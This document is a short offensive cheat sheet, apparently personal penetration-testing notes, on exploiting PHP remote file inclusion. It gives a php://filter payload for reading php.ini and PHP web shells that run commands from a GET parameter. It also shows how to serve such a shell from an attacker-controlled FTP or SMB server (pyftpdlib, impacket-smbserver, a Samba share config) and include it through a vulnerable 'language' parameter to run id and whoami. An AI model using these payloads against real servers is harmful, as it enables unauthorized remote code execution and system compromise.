# Verify RFI
```bash
http://$IP:<PORT>/index.php?language=php://filter/read=convert.base64-encode/resource=../../../../etc/php/7.4/apache2/php.ini
echo '<base64>' | base64 -d | grep allow_url_include
```
```bash
/index.php?language=http://127.0.0.1:80/index.php
```
# HTTP + PHP
```bash
<?php phpinfo(); ?>
<?php system('whoami'); ?>
<?php system($_GET['cmd']); ?>
cat << EOF > shell.php
<?php system($_GET['cmd']); ?>
EOF
```
# FTP
```bash
sudo python -m pyftpdlib -p 21
ftp://<IP>/shell.php&cmd=id
# if the server requires valid authentication
curl '.../index.php?language=ftp://user:pass@localhost/shell.php?cmd=id'
```
# Samba SMB server > RFI
if the vulnerable web application is hosted on a Windows server, we don't need the `allow_url_include` setting to be enabled for RFI exploit because we can utilize SMB for the RFI.
This is because Windows treats files on remote SMB servers as normal files, which can be referenced directly with a UNC path.
##### 1
```bash
impacket-smbserver -smb2support share $(pwd)
/index.php?language=\\<IP>\share\shell.php&cmd=whoami
```
##### 2
```bash
[wook]
path = /home/kali/wook
writable = no
guest ok = yes
guest only = yes
read only = yes
directory mode = 0555
force user = nobody
```
```bash
# change the directory and run the commands
cd /home/kali/wook
chmod 0555 /home/kali/wook
sudo chown -R nobody:nogroup /home/kali/wook
```
```bash
sudo service smbd restart
```
```bash
# check if our server is running
smbmap -H <my_IP>
```